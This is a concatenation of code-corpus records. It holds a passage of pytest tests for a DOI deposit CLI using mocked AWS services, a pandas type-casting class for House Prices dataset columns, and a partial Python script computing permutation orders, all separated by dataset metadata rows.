"Insufficient metadata for 10.1002/nome.tadata, missing title or URL"
in caplog.text
)
assert "Contents" not in s3_class.client.list_objects(Bucket="awd")
assert "Submission process has completed" in caplog.text
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
def test_deposit_pdf_unavailable(caplog, web_mock, s3_mock, s3_class, runner):
with caplog.at_level(logging.DEBUG):
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
result = runner.invoke(
cli,
[
"--doi_table",
"test_dois",
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"deposit",
"--doi_file_path",
"tests/fixtures/doi_pdf_unavailable.csv",
"--metadata_url",
"http://example.com/works/",
"--content_url",
"http://example.com/doi/",
"--bucket",
"awd",
"--sqs_input_queue",
"mock-input-queue",
"--collection_handle",
"123.4/5678",
],
)
assert result.exit_code == 0
assert "A PDF could not be retrieved for DOI: 10.1002/none.0000" in caplog.text
assert "Contents" not in s3_class.client.list_objects(Bucket="awd")
assert "Submission process has completed" in caplog.text
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
def test_deposit_s3_upload_failed(caplog, web_mock, s3_mock, s3_class, runner):
with caplog.at_level(logging.DEBUG):
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
result = runner.invoke(
cli,
[
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"--doi_table",
"test_dois",
"deposit",
"--doi_file_path",
"tests/fixtures/doi_success.csv",
"--metadata_url",
"http://example.com/works/",
"--content_url",
"http://example.com/doi/",
"--bucket",
"not-a-bucket",
"--sqs_input_queue",
"mock-input-queue",
"--collection_handle",
"123.4/5678",
],
)
assert result.exit_code == 0
assert "Upload failed: 10.1002-term.3131.json" in caplog.text
assert "Contents" not in s3_class.client.list_objects(Bucket="awd")
assert "Submission process has completed" in caplog.text
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
@mock_sqs
def test_listen_success(
caplog,
sqs_class,
result_failure_message_attributes,
result_success_message_attributes,
result_failure_message_body,
result_success_message_body,
runner,
):
with caplog.at_level(logging.DEBUG):
sqs = boto3.resource("sqs", region_name="us-east-1")
sqs.create_queue(QueueName="mock-output-queue")
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
sqs_class.send(
"https://queue.amazonaws.com/123456789012/",
"mock-output-queue",
result_failure_message_attributes,
result_failure_message_body,
)
sqs_class.send(
"https://queue.amazonaws.com/123456789012/",
"mock-output-queue",
result_success_message_attributes,
result_success_message_body,
)
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
dynamodb.put_item(
TableName="test_dois",
Item={
"doi": {"S": "111.1/1111"},
"status": {"S": "Processing"},
"attempts": {"S": "1"},
},
)
dynamodb.put_item(
TableName="test_dois",
Item={
"doi": {"S": "222.2/2222"},
"status": {"S": "Processing"},
"attempts": {"S": "1"},
},
)
result = runner.invoke(
cli,
[
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--doi_table",
"test_dois",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"listen",
"--retry_threshold",
"10",
],
)
assert result.exit_code == 0
assert str(result_failure_message_body) in caplog.text
assert str(result_success_message_body) in caplog.text
assert "Messages received and deleted from output queue" in caplog.text
messages = sqs_class.receive(
"https://queue.amazonaws.com/123456789012/", "mock-output-queue"
)
assert next(messages, None) is None
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
@mock_sqs
def test_listen_failure(caplog, runner):
with caplog.at_level(logging.DEBUG):
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
result = runner.invoke(
cli,
[
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--doi_table",
"test_dois",
"--sqs_output_queue",
"non-existent",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"listen",
"--retry_threshold",
"10",
],
)
assert result.exit_code == 0
assert "Failure while retrieving SQS messages" in caplog.text
assert "Logs sent to" in caplog.text
| 35.075676
| 87
| 0.530282
| 1,300
| 12,978
| 5.048462
| 0.127692
| 0.030474
| 0.031083
| 0.031693
| 0.870181
| 0.852506
| 0.798568
| 0.776931
| 0.770075
| 0.757885
| 0
| 0.039742
| 0.342734
| 12,978
| 369
| 88
| 35.170732
| 0.72966
| 0
| 0
| 0.765896
| 0
| 0
| 0.282786
| 0.025659
| 0
| 0
| 0
| 0
| 0.098266
| 1
| 0.028902
| false
| 0
| 0.011561
| 0
| 0.040462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
952f524545dd592b1c3efe13c22b5c03db89b160
| 13,612
|
py
|
Python
|
script/data_handler/HousePricesTypeCasting.py
|
demetoir/MLtools
|
8c42fcd4cc71728333d9c116ade639fe57d50d37
|
[
"MIT"
] | null | null | null |
script/data_handler/HousePricesTypeCasting.py
|
demetoir/MLtools
|
8c42fcd4cc71728333d9c116ade639fe57d50d37
|
[
"MIT"
] | null | null | null |
script/data_handler/HousePricesTypeCasting.py
|
demetoir/MLtools
|
8c42fcd4cc71728333d9c116ade639fe57d50d37
|
[
"MIT"
] | null | null | null |
from script.data_handler.Base.base_df_typecasting import base_df_typecasting
import pandas as pd
DF = pd.DataFrame
Series = pd.Series
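# Column-by-column dtype casting for the Kaggle House Prices dataset. Each
# col_NN_<feature> hook receives the full frame plus that column's slice and
# returns the frame after casting via the base class's to_str/to_int/to_float.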
def df_value_counts(df):
return [df[key].value_counts() for key in df]
def print_info(df, col_key, partial_df, series, Xs_keys, Ys_key):
print(col_key)
print(partial_df.info())
print(df_value_counts(partial_df))
print(f'unique count : {len(series.value_counts(ascending=True).keys().values)}')
print()
class HousePriceTypeCasting(base_df_typecasting):
def col_00_1stFlrSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_01_2ndFlrSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_02_3SsnPorch(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_04_BedroomAbvGr(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_05_BldgType(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_06_BsmtCond(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_07_BsmtExposure(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_08_BsmtFinSF1(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_09_BsmtFinSF2(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_10_BsmtFinType1(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
        df = self.to_str(df, col_key)
return df
def col_11_BsmtFinType2(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_12_BsmtFullBath(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_13_BsmtHalfBath(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_14_BsmtQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_15_BsmtUnfSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_16_CentralAir(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_17_Condition1(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_18_Condition2(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_19_Electrical(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_20_EnclosedPorch(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_21_ExterCond(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_22_ExterQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_23_Exterior1st(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_24_Exterior2nd(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_26_FireplaceQu(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_27_Fireplaces(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_28_Foundation(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_29_FullBath(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_30_Functional(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_31_GarageArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_32_GarageCars(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_33_GarageCond(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_34_GarageFinish(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_35_GarageQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_36_GarageType(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_37_GarageYrBlt(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_38_GrLivArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_39_HalfBath(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_40_Heating(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_41_HeatingQC(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_42_HouseStyle(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_43_Id(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
return df
def col_44_KitchenAbvGr(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_45_KitchenQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_46_LandContour(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_47_LandSlope(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_48_LotArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_49_LotConfig(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_50_LotFrontage(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_51_LotShape(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_52_LowQualFinSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_53_MSSubClass(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_54_MSZoning(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_55_MasVnrArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_56_MasVnrType(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_58_MiscVal(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_59_MoSold(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_60_Neighborhood(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_61_OpenPorchSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_62_OverallCond(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_63_OverallQual(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_64_PavedDrive(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_65_PoolArea(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_67_RoofMatl(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_68_RoofStyle(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_69_SaleCondition(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_71_SaleType(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_72_ScreenPorch(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_73_Street(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_74_TotRmsAbvGrd(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
def col_75_TotalBsmtSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_float(df, col_key)
return df
def col_77_WoodDeckSF(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_78_YearBuilt(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_79_YearRemodAdd(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_int(df, col_key)
return df
def col_80_YrSold(self, df: DF, col_key: str, partial_df: DF, series: Series, Xs_key: list, Ys_key: list):
df = self.to_str(df, col_key)
return df
| 38.451977
| 118
| 0.632236
| 2,294
| 13,612
| 3.485179
| 0.083697
| 0.075047
| 0.146091
| 0.103189
| 0.843277
| 0.843277
| 0.843277
| 0.843277
| 0.843277
| 0.843277
| 0
| 0.015881
| 0.255216
| 13,612
| 353
| 119
| 38.560907
| 0.772736
| 0
| 0
| 0.618026
| 0
| 0
| 0.005355
| 0.004224
| 0
| 0
| 0
| 0
| 0
| 1
| 0.330472
| false
| 0
| 0.008584
| 0.025751
| 0.669528
| 0.025751
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1f3dd4e43cfc2a0fcf745ee0d4a8bc13b62bb6b0
| 96
|
py
|
Python
|
vex/parsers/__init__.py
|
gitmoneyyy123/VintageEx
|
4f81b8a6ef9d7ff0572bfa9728ad38ac0c8e7368
|
[
"MIT"
] | 134
|
2015-01-09T22:23:51.000Z
|
2022-03-17T16:25:14.000Z
|
vex/parsers/__init__.py
|
gitmoneyyy123/VintageEx
|
4f81b8a6ef9d7ff0572bfa9728ad38ac0c8e7368
|
[
"MIT"
] | 3
|
2015-12-16T08:15:30.000Z
|
2020-08-18T05:49:41.000Z
|
vex/parsers/__init__.py
|
gitmoneyyy123/VintageEx
|
4f81b8a6ef9d7ff0572bfa9728ad38ac0c8e7368
|
[
"MIT"
] | 27
|
2015-01-21T18:22:34.000Z
|
2019-09-01T12:26:21.000Z
|
from vex.parsers import cmd_line
from vex.parsers import g_cmd
from vex.parsers import s_cmd
| 24
| 33
| 0.8125
| 18
| 96
| 4.166667
| 0.444444
| 0.28
| 0.56
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 96
| 3
| 34
| 32
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2f786235e3db248ff91325cbc24bd4b4eb9689dd
| 189
|
py
|
Python
|
tzlocal/__init__.py
|
serialbandicoot/tzlocal
|
f5c35ce9ab3efe3cfb60bd80de85dad91236576a
|
[
"MIT"
] | null | null | null |
tzlocal/__init__.py
|
serialbandicoot/tzlocal
|
f5c35ce9ab3efe3cfb60bd80de85dad91236576a
|
[
"MIT"
] | null | null | null |
tzlocal/__init__.py
|
serialbandicoot/tzlocal
|
f5c35ce9ab3efe3cfb60bd80de85dad91236576a
|
[
"MIT"
] | null | null | null |
import sys
if sys.platform == "win32":
from tzlocal.win32 import get_localzone, reload_localzone # pragma: no cover
else:
from tzlocal.unix import get_localzone, reload_localzone
| 27
| 81
| 0.767196
| 26
| 189
| 5.423077
| 0.576923
| 0.156028
| 0.255319
| 0.340426
| 0.468085
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025316
| 0.164021
| 189
| 6
| 82
| 31.5
| 0.867089
| 0.084656
| 0
| 0
| 0
| 0
| 0.02924
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2f882fb85e2e9134c7665871ff7d24193ee4b515
| 24,453
|
py
|
Python
|
permutations1.py
|
YanshuHu/combinatorics-oj1
|
551286aaac63094b74a3bbb00462a1bd696608fd
|
[
"Apache-2.0"
] | null | null | null |
permutations1.py
|
YanshuHu/combinatorics-oj1
|
551286aaac63094b74a3bbb00462a1bd696608fd
|
[
"Apache-2.0"
] | null | null | null |
permutations1.py
|
YanshuHu/combinatorics-oj1
|
551286aaac63094b74a3bbb00462a1bd696608fd
|
[
"Apache-2.0"
] | null | null | null |
def main():
    # First input line: n, the order type (1-4) and a signed step count k.
    first_line = [int(i) for i in input().split()]
    # Second input line: the starting permutation.
    second_line = [int(i) for i in input().split()]
    n = first_line[0]
    order_type = first_line[1]
    add = first_line[2] >= 0
    k = abs(first_line[2])
    if order_type == 1:
        shifted = add_1(second_line, k, n) if add else subtract_1(second_line, k, n)
        output = dict_order(shifted)
    if order_type == 2:
        shifted = add_2(second_line, k, n) if add else subtract_2(second_line, k, n)
        output = order_2(shifted)
    if order_type == 3:
        shifted = add_3(second_line, k, n) if add else subtract_3(second_line, k, n)
        output = order_3(shifted)
    if order_type == 4:
        shifted = add_4(second_line, k, n) if add else subtract_4(second_line, k, n)
        output = order_4(shifted)
    print(' '.join(str(i) for i in output))
############### lexicographic order (type 1)
def shift_1(lst):
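    # Lexicographic intermediate number: for each position, count how many of
    # the remaining elements are smaller. NOTE: new_lst aliases lst, so the
    # caller's list is consumed in place.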
new_lst = lst
shifted_num = []
while new_lst:
count = 0
for i in range(len(new_lst)):
if new_lst[i] < new_lst[0]:
count += 1
shifted_num.append(count)
del new_lst[0]
shifted_num.pop()
return shifted_num
def add_1(lst, k, n):
line_two = shift_1(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
#print(reverse_line_two[0])
#print(k)
step_one = reverse_line_two[0] + k
first_carry = step_one//line_one[0]
if step_one >= line_one[0]:
#first_carry = step_one//line_one[0]
#print("first_carry: ", first_carry)
first_append = step_one%line_one[0]
#print("first_append: ", first_append)
final_list.append(first_append)
if step_one < line_one[0]:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print(reverse_line_two)
while index < (n -1):
#print("current_carry: ", current_carry)
if (reverse_line_two[index]) + current_carry >= line_one[index]:
res = reverse_line_two[index] + current_carry
current_carry = res//line_one[index]
#print("appending: ",res%line_one[index])
final_list.append(res%line_one[index])
index += 1
if (reverse_line_two[index] + current_carry) < line_one[index]:
res1 = reverse_line_two[index] + current_carry
current_carry = 0
#print("appending: ",res1%line_one[index])
final_list.append(res1)
index += 1
#print("final_list: ", final_list[::-1])
return final_list[::-1]
def subtract_1(lst, k, n):
line_two = shift_1(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
step_one = reverse_line_two[0] - k
#print(step_one)
if step_one < 0:
first_carry = -((step_one) // line_one[0])
first_append = step_one%line_one[0]
#print(first_append)
final_list.append(first_append)
if step_one >= 0:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print("current_carry: ", current_carry)
while index < (n-1):
#print("current_carry: ", current_carry)
if reverse_line_two[index] - current_carry < 0:
res = reverse_line_two[index] - current_carry
#print("res: ",res)
final_list.append(res%line_one[index])
current_carry = -(res//line_one[index])
index += 1
if reverse_line_two[index] - current_carry >= 0:
res1 = reverse_line_two[index] - current_carry
current_carry = 0
final_list.append(res1)
index += 1
# print("line_one: ", line_one, "line_two: ", reverse_line_two)
# print("append value: ",(reverse_line_two[0]-k)%line_one[0])
# final_list.append((reverse_line_two[0]-k)%line_one[0])
# print("carry value: ", first_carry, final_list)
# print("carried: ", reverse_line_two[1] - first_carry )
# carried = reverse_line_two[1] - first_carry
# second_append = (carried)%line_one[1]
# final_list.append(second_append)
#print(final_list[::-1])
return final_list[::-1]
def num_smaller(lst, b):
'''
lst is the list from mylist[:i]
b is the comparator which is current_carry
'''
current_carry = b
while True:
count = 0
for i in range(len(lst)):
if lst[i] < current_carry:
#print("lst: ", lst, "current_carry: ", current_carry)
count += 1
lst[i] = 100
current_carry += 1
if count == 0:
break
#print(current_carry)
return current_carry
def dict_order(lst):
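    # Convert a lexicographic intermediate number back into a permutation:
    # digit i says how many already-placed values are smaller than the value
    # that belongs at position i.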
limit = len(lst) + 1
mylist = []
for i in range(limit):
mylist.append(-1)
for i in range(len(lst)):
current_carry = lst[i] + 1
if i == 0:
mylist[0] = (current_carry)
if i > 0:
smaller = num_smaller(mylist[:i],current_carry)
#print("lst: ", mylist[:i], "current_carry: ", current_carry, "smaller: ", smaller)
if smaller not in mylist[:i]:
mylist[i] = smaller
while (smaller) in mylist[:i]:
smaller += 1
mylist[i] = smaller
left = []
no = []
for i in range(len(mylist)):
left.append(i+1)
for i in left:
if i not in mylist:
no.append(i)
for i in range(len(mylist)):
if mylist[i] == -1:
mylist[i] = no[0]
#print(mylist)
return mylist
###############
############### increasing-carry order (type 2)
def shift_2(lst):
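    # Intermediate number for the increasing-carry order: repeatedly take the
    # current maximum and count the smaller elements to its right.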
new_lst = lst
line_two = []
while new_lst:
count = 0
biggest = max(new_lst)
biggest_index = new_lst.index(biggest)
for i in new_lst[biggest_index+1:]:
if i < biggest:
count += 1
line_two.append(count)
del new_lst[biggest_index]
line_two.pop()
#print("line_two: ", line_two)
return line_two
def add_2(lst, k, n):
line_two = shift_2(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
step_one = reverse_line_two[0] + k
if step_one >= line_one[0]:
first_carry = step_one//line_one[0]
#print("first_carry: ", first_carry)
first_append = step_one%line_one[0]
#print("first_append: ", first_append)
final_list.append(first_append)
if step_one < line_one[0]:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print(reverse_line_two)
while index < (n -1):
#print("current_carry: ", current_carry)
if (reverse_line_two[index]) + current_carry >= line_one[index]:
res = reverse_line_two[index] + current_carry
current_carry = res//line_one[index]
#print("appending: ",res%line_one[index])
final_list.append(res%line_one[index])
index += 1
if (reverse_line_two[index] + current_carry) < line_one[index]:
res1 = reverse_line_two[index] + current_carry
current_carry = 0
#print("appending: ",res1%line_one[index])
final_list.append(res1)
index += 1
#print("final_list: ", final_list)
return final_list[::-1]
def subtract_2(lst, k, n):
line_two = shift_2(lst)
#bound
line_one = []
#Easier to manipulate in list notation
reverse_line_two = line_two[::-1]
#subtracted list i want
final_list = []
#length of the bounds
limit = len(reverse_line_two) + 1
for i in range(limit):
line_one.append(i + 1)
line_one.pop(0)
step_one = reverse_line_two[0] - k
#print(step_one)
if step_one < 0:
first_carry = -((step_one) // line_one[0])
#print(first_carry)
first_append = step_one%line_one[0]
#print(first_append)
final_list.append(first_append)
if step_one >= 0:
first_carry = 0
first_append = step_one%line_one[0]
final_list.append(first_append)
index = 1
current_carry = first_carry
#print("final_list: ", final_list)
while index < (n-1):
#print("current_carry: ", current_carry)
#print("index: ", reverse_line_two[index])
#print(reverse_line_two[index] - current_carry)
if reverse_line_two[index] - current_carry < 0:
res = reverse_line_two[index] - current_carry
#print("res: ",res)
final_list.append(res%line_one[index])
current_carry = -(res//line_one[index])
index += 1
if reverse_line_two[index] - current_carry >= 0:
res1 = reverse_line_two[index] - current_carry
current_carry = 0
final_list.append(res1)
index += 1
# print("line_one: ", line_one, "line_two: ", reverse_line_two)
# print("append value: ",(reverse_line_two[0]-k)%line_one[0])
# final_list.append((reverse_line_two[0]-k)%line_one[0])
